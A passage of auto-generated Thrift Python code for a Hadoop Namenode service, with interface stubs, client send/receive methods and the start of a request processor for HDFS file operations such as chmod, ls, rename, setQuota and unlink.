"""
pass
def chown(self, ctx, path, owner, group):
"""
Set owner of a file or directory.
If either parameter 'owner' or 'group' is set to null, that
parameter is left unchanged.
Parameters 'owner' and 'group' cannot be both null.
Parameters:
- ctx
- path: Path to the file or directory
- owner: New owner.
- group: New group.
"""
pass
def df(self, ctx):
"""
Return a list containing:
(index 0) The total storage capacity of the file system (in bytes).
(index 1) The total used space of the file system (in bytes).
(index 2) The available storage of the file system (in bytes).
Parameters:
- ctx
"""
pass
def enterSafeMode(self, ctx):
"""
Enter safe mode.
Parameters:
- ctx
"""
pass
def getBlocks(self, ctx, path, offset, length):
"""
Get a list of all blocks containing a region of a file
Parameters:
- ctx
- path: Path to the file.
- offset: Offset of the region.
- length: Length of the region
"""
pass
def getPreferredBlockSize(self, ctx, path):
"""
Get the preferred block size for the given file.
The path must exist, or common.IOException is thrown.
Parameters:
- ctx
- path: Path to the file.
"""
pass
def isInSafeMode(self, ctx):
"""
Returns whether HDFS is in safe mode or not.
Parameters:
- ctx
"""
pass
def leaveSafeMode(self, ctx):
"""
Leave safe mode.
Parameters:
- ctx
"""
pass
def ls(self, ctx, path):
"""
Get a listing of the indicated directory.
Parameters:
- ctx
- path: Path to the directory.
"""
pass
def mkdirhier(self, ctx, path, perms):
"""
Create a directory (or hierarchy of directories).
Returns false if directory did not exist and could not be created,
true otherwise.
Parameters:
- ctx
- path: Path to the directory.
- perms: Access permissions of the directory.
"""
pass
def refreshNodes(self, ctx):
"""
Tells the name node to reread the hosts and exclude files.
Parameters:
- ctx
"""
pass
def rename(self, ctx, path, newPath):
"""
Rename an item in the file system namespace.
Returns true if successful, or
false if the old name does not exist or if the new name already
belongs to the namespace.
Parameters:
- ctx
- path: Path to existing file or directory.
- newPath: New path.
"""
pass
def reportBadBlocks(self, ctx, blocks):
"""
Report corrupted blocks.
Parameters:
- ctx
- blocks: List of corrupted blocks.
"""
pass
def stat(self, ctx, path):
"""
Get information about a path in HDFS.
Return value will be nul if path does not exist.
Parameters:
- ctx
- path: Path of the file or directory.
"""
pass
def getContentSummary(self, ctx, Path):
"""
Get the summary of a directory's contents.
Note that this has runtime linear in the total number of nodes
in the directory tree - this can be expensive for directories
near the top of a big HDFS. Use with care.
Parameters:
- ctx
- Path
"""
pass
def multiGetContentSummary(self, ctx, paths):
"""
Get ContentSummary objects for multiple directories simultaneously. The same warnings
apply as for getContentSummary(...) above.
Parameters:
- ctx
- paths
"""
pass
def setQuota(self, ctx, path, namespaceQuota, diskspaceQuota):
"""
Set the quota for a directory.
Quota parameters may have three types of values:
(1) 0 or more: Quota will be set to that value.
(2) QUOTA_DONT_SET: Quota will not be changed,
(3) QUOTA_RESET: Quota will be reset.
Any other value is a runtime error.
Parameters:
- ctx
- path: Path of the directory.
- namespaceQuota: Limit on the number of names in the directory.
- diskspaceQuota: Limit on disk space occupied by all the files in the
directory.
"""
pass
def setReplication(self, ctx, path, replication):
"""
Set replication factor for an existing file.
This call just updates the value of the replication factor. The actual
block replication is not expected to be performed during this method call.
The blocks will be populated or removed in the background as the result of
the routine block maintenance procedures.
Returns true if successful, false if file does not exist or is a
directory.
Parameters:
- ctx
- path: Path of the file.
- replication: New replication factor.
"""
pass
def unlink(self, ctx, path, recursive):
"""
Delete a file or directory from the file system.
Any blocks belonging to the deleted files will be garbage-collected.
Parameters:
- ctx
- path: Path of the file or directory.
- recursive: Delete a non-empty directory recursively.
"""
pass
def utime(self, ctx, path, atime, mtime):
"""
Sets the modification and access time of a file or directory.
Setting *one single time paramater* to -1 means that time parameter
must not be set by this call.
Setting *both time parameters* to -1 means both of them must be set to
the current time.
Parameters:
- ctx
- path: Path of the file or directory.
- atime: Access time in milliseconds since 1970-01-01 00:00 UTC
- mtime: Modification time in milliseconds since 1970-01-01 00:00 UTC
"""
pass
def datanodeUp(self, name, storage, thriftPort):
"""
Inform the namenode that a datanode process has started.
Parameters:
- name: <host name>:<port number> of the datanode
- storage: the storage id of the datanode
- thriftPort: Thrift port of the datanode
"""
pass
def datanodeDown(self, name, storage, thriftPort):
"""
Inform the namenode that a datanode process has stopped.
Parameters:
- name: <host name>:<port number> of the datanode
- storage: the storage id of the datanode
- thriftPort: Thrift port of the datanode
"""
pass
def getDelegationToken(self, ctx, renewer):
"""
Get an HDFS delegation token.
Parameters:
- ctx
- renewer
"""
pass
class Client(hadoop.api.common.HadoopServiceBase.Client, Iface):
"""
Provides an interface to a Hadoop Namenode. It is basically a Thrift
translation of org.apache.hadoop.hdfs.protocol.ClientProtocol.
"""
def __init__(self, iprot, oprot=None):
hadoop.api.common.HadoopServiceBase.Client.__init__(self, iprot, oprot)
def chmod(self, ctx, path, perms):
"""
Set permissions of an existing file or directory.
Parameters:
- ctx
- path: Path of the file or directory.
- perms: New permissions for the file or directory.
"""
self.send_chmod(ctx, path, perms)
self.recv_chmod()
def send_chmod(self, ctx, path, perms):
self._oprot.writeMessageBegin('chmod', TMessageType.CALL, self._seqid)
args = chmod_args()
args.ctx = ctx
args.path = path
args.perms = perms
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_chmod(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = chmod_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def chown(self, ctx, path, owner, group):
"""
Set owner of a file or directory.
If either parameter 'owner' or 'group' is set to null, that
parameter is left unchanged.
Parameters 'owner' and 'group' cannot be both null.
Parameters:
- ctx
- path: Path to the file or directory
- owner: New owner.
- group: New group.
"""
self.send_chown(ctx, path, owner, group)
self.recv_chown()
def send_chown(self, ctx, path, owner, group):
self._oprot.writeMessageBegin('chown', TMessageType.CALL, self._seqid)
args = chown_args()
args.ctx = ctx
args.path = path
args.owner = owner
args.group = group
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_chown(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = chown_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def df(self, ctx):
"""
Return a list containing:
(index 0) The total storage capacity of the file system (in bytes).
(index 1) The total used space of the file system (in bytes).
(index 2) The available storage of the file system (in bytes).
Parameters:
- ctx
"""
self.send_df(ctx)
return self.recv_df()
def send_df(self, ctx):
self._oprot.writeMessageBegin('df', TMessageType.CALL, self._seqid)
args = df_args()
args.ctx = ctx
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_df(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = df_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "df failed: unknown result");
def enterSafeMode(self, ctx):
"""
Enter safe mode.
Parameters:
- ctx
"""
self.send_enterSafeMode(ctx)
self.recv_enterSafeMode()
def send_enterSafeMode(self, ctx):
self._oprot.writeMessageBegin('enterSafeMode', TMessageType.CALL, self._seqid)
args = enterSafeMode_args()
args.ctx = ctx
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_enterSafeMode(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = enterSafeMode_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def getBlocks(self, ctx, path, offset, length):
"""
Get a list of all blocks containing a region of a file
Parameters:
- ctx
- path: Path to the file.
- offset: Offset of the region.
- length: Length of the region
"""
self.send_getBlocks(ctx, path, offset, length)
return self.recv_getBlocks()
def send_getBlocks(self, ctx, path, offset, length):
self._oprot.writeMessageBegin('getBlocks', TMessageType.CALL, self._seqid)
args = getBlocks_args()
args.ctx = ctx
args.path = path
args.offset = offset
args.length = length
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getBlocks(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getBlocks_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "getBlocks failed: unknown result");
def getPreferredBlockSize(self, ctx, path):
"""
Get the preferred block size for the given file.
The path must exist, or common.IOException is thrown.
Parameters:
- ctx
- path: Path to the file.
"""
self.send_getPreferredBlockSize(ctx, path)
return self.recv_getPreferredBlockSize()
def send_getPreferredBlockSize(self, ctx, path):
self._oprot.writeMessageBegin('getPreferredBlockSize', TMessageType.CALL, self._seqid)
args = getPreferredBlockSize_args()
args.ctx = ctx
args.path = path
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getPreferredBlockSize(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getPreferredBlockSize_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "getPreferredBlockSize failed: unknown result");
def isInSafeMode(self, ctx):
"""
Returns whether HDFS is in safe mode or not.
Parameters:
- ctx
"""
self.send_isInSafeMode(ctx)
return self.recv_isInSafeMode()
def send_isInSafeMode(self, ctx):
self._oprot.writeMessageBegin('isInSafeMode', TMessageType.CALL, self._seqid)
args = isInSafeMode_args()
args.ctx = ctx
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_isInSafeMode(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = isInSafeMode_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "isInSafeMode failed: unknown result");
def leaveSafeMode(self, ctx):
"""
Leave safe mode.
Parameters:
- ctx
"""
self.send_leaveSafeMode(ctx)
self.recv_leaveSafeMode()
def send_leaveSafeMode(self, ctx):
self._oprot.writeMessageBegin('leaveSafeMode', TMessageType.CALL, self._seqid)
args = leaveSafeMode_args()
args.ctx = ctx
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_leaveSafeMode(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = leaveSafeMode_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def ls(self, ctx, path):
"""
Get a listing of the indicated directory.
Parameters:
- ctx
- path: Path to the directory.
"""
self.send_ls(ctx, path)
return self.recv_ls()
def send_ls(self, ctx, path):
self._oprot.writeMessageBegin('ls', TMessageType.CALL, self._seqid)
args = ls_args()
args.ctx = ctx
args.path = path
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ls(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = ls_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "ls failed: unknown result");
def mkdirhier(self, ctx, path, perms):
"""
Create a directory (or hierarchy of directories).
Returns false if directory did not exist and could not be created,
true otherwise.
Parameters:
- ctx
- path: Path to the directory.
- perms: Access permissions of the directory.
"""
self.send_mkdirhier(ctx, path, perms)
return self.recv_mkdirhier()
def send_mkdirhier(self, ctx, path, perms):
self._oprot.writeMessageBegin('mkdirhier', TMessageType.CALL, self._seqid)
args = mkdirhier_args()
args.ctx = ctx
args.path = path
args.perms = perms
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_mkdirhier(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = mkdirhier_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "mkdirhier failed: unknown result");
def refreshNodes(self, ctx):
"""
Tells the name node to reread the hosts and exclude files.
Parameters:
- ctx
"""
self.send_refreshNodes(ctx)
self.recv_refreshNodes()
def send_refreshNodes(self, ctx):
self._oprot.writeMessageBegin('refreshNodes', TMessageType.CALL, self._seqid)
args = refreshNodes_args()
args.ctx = ctx
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_refreshNodes(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = refreshNodes_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def rename(self, ctx, path, newPath):
"""
Rename an item in the file system namespace.
Returns true if successful, or
false if the old name does not exist or if the new name already
belongs to the namespace.
Parameters:
- ctx
- path: Path to existing file or directory.
- newPath: New path.
"""
self.send_rename(ctx, path, newPath)
return self.recv_rename()
def send_rename(self, ctx, path, newPath):
self._oprot.writeMessageBegin('rename', TMessageType.CALL, self._seqid)
args = rename_args()
args.ctx = ctx
args.path = path
args.newPath = newPath
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_rename(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = rename_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "rename failed: unknown result");
def reportBadBlocks(self, ctx, blocks):
"""
Report corrupted blocks.
Parameters:
- ctx
- blocks: List of corrupted blocks.
"""
self.send_reportBadBlocks(ctx, blocks)
self.recv_reportBadBlocks()
def send_reportBadBlocks(self, ctx, blocks):
self._oprot.writeMessageBegin('reportBadBlocks', TMessageType.CALL, self._seqid)
args = reportBadBlocks_args()
args.ctx = ctx
args.blocks = blocks
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_reportBadBlocks(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = reportBadBlocks_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def stat(self, ctx, path):
"""
Get information about a path in HDFS.
Return value will be nul if path does not exist.
Parameters:
- ctx
- path: Path of the file or directory.
"""
self.send_stat(ctx, path)
return self.recv_stat()
def send_stat(self, ctx, path):
self._oprot.writeMessageBegin('stat', TMessageType.CALL, self._seqid)
args = stat_args()
args.ctx = ctx
args.path = path
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_stat(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = stat_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "stat failed: unknown result");
def getContentSummary(self, ctx, Path):
"""
Get the summary of a directory's contents.
Note that this has runtime linear in the total number of nodes
in the directory tree - this can be expensive for directories
near the top of a big HDFS. Use with care.
Parameters:
- ctx
- Path
"""
self.send_getContentSummary(ctx, Path)
return self.recv_getContentSummary()
def send_getContentSummary(self, ctx, Path):
self._oprot.writeMessageBegin('getContentSummary', TMessageType.CALL, self._seqid)
args = getContentSummary_args()
args.ctx = ctx
args.Path = Path
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getContentSummary(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getContentSummary_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "getContentSummary failed: unknown result");
def multiGetContentSummary(self, ctx, paths):
"""
Get ContentSummary objects for multiple directories simultaneously. The same warnings
apply as for getContentSummary(...) above.
Parameters:
- ctx
- paths
"""
self.send_multiGetContentSummary(ctx, paths)
return self.recv_multiGetContentSummary()
def send_multiGetContentSummary(self, ctx, paths):
self._oprot.writeMessageBegin('multiGetContentSummary', TMessageType.CALL, self._seqid)
args = multiGetContentSummary_args()
args.ctx = ctx
args.paths = paths
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_multiGetContentSummary(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = multiGetContentSummary_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "multiGetContentSummary failed: unknown result");
def setQuota(self, ctx, path, namespaceQuota, diskspaceQuota):
"""
Set the quota for a directory.
Quota parameters may have three types of values:
(1) 0 or more: Quota will be set to that value.
(2) QUOTA_DONT_SET: Quota will not be changed,
(3) QUOTA_RESET: Quota will be reset.
Any other value is a runtime error.
Parameters:
- ctx
- path: Path of the directory.
- namespaceQuota: Limit on the number of names in the directory.
- diskspaceQuota: Limit on disk space occupied by all the files in the
directory.
"""
self.send_setQuota(ctx, path, namespaceQuota, diskspaceQuota)
self.recv_setQuota()
def send_setQuota(self, ctx, path, namespaceQuota, diskspaceQuota):
self._oprot.writeMessageBegin('setQuota', TMessageType.CALL, self._seqid)
args = setQuota_args()
args.ctx = ctx
args.path = path
args.namespaceQuota = namespaceQuota
args.diskspaceQuota = diskspaceQuota
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_setQuota(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = setQuota_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def setReplication(self, ctx, path, replication):
"""
Set replication factor for an existing file.
This call just updates the value of the replication factor. The actual
block replication is not expected to be performed during this method call.
The blocks will be populated or removed in the background as the result of
the routine block maintenance procedures.
Returns true if successful, false if file does not exist or is a
directory.
Parameters:
- ctx
- path: Path of the file.
- replication: New replication factor.
"""
self.send_setReplication(ctx, path, replication)
return self.recv_setReplication()
def send_setReplication(self, ctx, path, replication):
self._oprot.writeMessageBegin('setReplication', TMessageType.CALL, self._seqid)
args = setReplication_args()
args.ctx = ctx
args.path = path
args.replication = replication
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_setReplication(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = setReplication_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "setReplication failed: unknown result");
def unlink(self, ctx, path, recursive):
"""
Delete a file or directory from the file system.
Any blocks belonging to the deleted files will be garbage-collected.
Parameters:
- ctx
- path: Path of the file or directory.
- recursive: Delete a non-empty directory recursively.
"""
self.send_unlink(ctx, path, recursive)
return self.recv_unlink()
def send_unlink(self, ctx, path, recursive):
self._oprot.writeMessageBegin('unlink', TMessageType.CALL, self._seqid)
args = unlink_args()
args.ctx = ctx
args.path = path
args.recursive = recursive
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_unlink(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = unlink_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "unlink failed: unknown result");
def utime(self, ctx, path, atime, mtime):
"""
Sets the modification and access time of a file or directory.
Setting *one single time paramater* to -1 means that time parameter
must not be set by this call.
Setting *both time parameters* to -1 means both of them must be set to
the current time.
Parameters:
- ctx
- path: Path of the file or directory.
- atime: Access time in milliseconds since 1970-01-01 00:00 UTC
- mtime: Modification time in milliseconds since 1970-01-01 00:00 UTC
"""
self.send_utime(ctx, path, atime, mtime)
self.recv_utime()
def send_utime(self, ctx, path, atime, mtime):
self._oprot.writeMessageBegin('utime', TMessageType.CALL, self._seqid)
args = utime_args()
args.ctx = ctx
args.path = path
args.atime = atime
args.mtime = mtime
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_utime(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = utime_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def datanodeUp(self, name, storage, thriftPort):
"""
Inform the namenode that a datanode process has started.
Parameters:
- name: <host name>:<port number> of the datanode
- storage: the storage id of the datanode
- thriftPort: Thrift port of the datanode
"""
self.send_datanodeUp(name, storage, thriftPort)
self.recv_datanodeUp()
def send_datanodeUp(self, name, storage, thriftPort):
self._oprot.writeMessageBegin('datanodeUp', TMessageType.CALL, self._seqid)
args = datanodeUp_args()
args.name = name
args.storage = storage
args.thriftPort = thriftPort
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_datanodeUp(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = datanodeUp_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def datanodeDown(self, name, storage, thriftPort):
"""
Inform the namenode that a datanode process has stopped.
Parameters:
- name: <host name>:<port number> of the datanode
- storage: the storage id of the datanode
- thriftPort: Thrift port of the datanode
"""
self.send_datanodeDown(name, storage, thriftPort)
self.recv_datanodeDown()
def send_datanodeDown(self, name, storage, thriftPort):
self._oprot.writeMessageBegin('datanodeDown', TMessageType.CALL, self._seqid)
args = datanodeDown_args()
args.name = name
args.storage = storage
args.thriftPort = thriftPort
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_datanodeDown(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = datanodeDown_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def getDelegationToken(self, ctx, renewer):
"""
Get an HDFS delegation token.
Parameters:
- ctx
- renewer
"""
self.send_getDelegationToken(ctx, renewer)
return self.recv_getDelegationToken()
def send_getDelegationToken(self, ctx, renewer):
self._oprot.writeMessageBegin('getDelegationToken', TMessageType.CALL, self._seqid)
args = getDelegationToken_args()
args.ctx = ctx
args.renewer = renewer
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getDelegationToken(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getDelegationToken_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "getDelegationToken failed: unknown result");
class Processor(hadoop.api.common.HadoopServiceBase.Processor, Iface, TProcessor):
def __init__(self, handler):
hadoop.api.common.HadoopServiceBase.Processor.__init__(self, handler)
self._processMap["chmod"] = Processor.process_chmod
self._processMap["chown"] = Processor.process_chown
self._processMap["df"] = Processor.process_df
self._processMap["enterSafeMode"] = Processor.process_enterSafeMode
self._processMap["getBlocks"] = Processor.process_getBlocks
self._processMap["getPreferredBlockSize"] = Processor.process_getPreferredBlockSize
self._processMap["isInSafeMode"] = Processor.process_isInSafeMode
self._processMap["leaveSafeMode"] = Processor.process_leaveSafeMode
self._processMap["ls"] = Processor.process_ls
self._processMap["mkdirhier"] = Processor.process_mkdirhier
self._processMap["refreshNodes"] = Processor.process_refreshNodes
self._processMap["rename"] = Processor.process_rename
self._processMap["reportBadBlocks"] = Processor.process_reportBadBlocks
self._processMap["stat"] = Processor.process_stat
self._processMap["getContentSummary"] = Processor.process_getContentSummary
self._processMap["multiGetContentSummary"] = Processor.process_multiGetContentSummary
self._processMap["setQuota"] = Processor.process_setQuota
self._processMap["setReplication"] = Processor.process_setReplication
self._processMap["unlink"] = Processor.process_unlink
self._processMap["utime"] = Processor.process_utime
self._processMap["datanodeUp"] = Processor.process_datanodeUp
self._processMap["datanodeDown"] = Processor.process_datanodeDown
self._processMap["getDelegationToken"] = Processor.process_getDelegationToken
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_chmod(self, seqid, iprot, oprot):
args = chmod_args()
args.read(iprot)
iprot.readMessageEnd()
result = chmod_result()
try:
self._handler.chmod(args.ctx, args.path, args.perms)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("chmod", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_chown(self, seqid, iprot, oprot):
args = chown_args()
args.read(iprot)
iprot.readMessageEnd()
result = chown_result()
try:
self._handler.chown(args.ctx, args.path, args.owner, args.group)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("chown", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_df(self, seqid, iprot, oprot):
args = df_args()
args.read(iprot)
iprot.readMessageEnd()
result = df_result()
result.success = self._handler.df(args.ctx)
oprot.writeMessageBegin("df", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_enterSafeMode(self, seqid, iprot, oprot):
args = enterSafeMode_args()
args.read(iprot)
iprot.readMessageEnd()
result = enterSafeMode_result()
try:
self._handler.enterSafeMode(args.ctx)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("enterSafeMode", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getBlocks(self, seqid, iprot, oprot):
args = getBlocks_args()
args.read(iprot)
iprot.readMessageEnd()
result = getBlocks_result()
try:
result.success = self._handler.getBlocks(args.ctx, args.path, args.offset, args.length)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("getBlocks", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getPreferredBlockSize(self, seqid, iprot, oprot):
args = getPreferredBlockSize_args()
args.read(iprot)
iprot.readMessageEnd()
result = getPreferredBlockSize_result()
try:
result.success = self._handler.getPreferredBlockSize(args.ctx, args.path)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("getPreferredBlockSize", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_isInSafeMode(self, seqid, iprot, oprot):
args = isInSafeMode_args()
args.read(iprot)
iprot.readMessageEnd()
result = isInSafeMode_result()
try:
result.success = self._handler.isInSafeMode(args.ctx)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("isInSafeMode", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_leaveSafeMode(self, seqid, iprot, oprot):
args = leaveSafeMode_args()
args.read(iprot)
iprot.readMessageEnd()
result = leaveSafeMode_result()
try:
self._handler.leaveSafeMode(args.ctx)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("leaveSafeMode", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
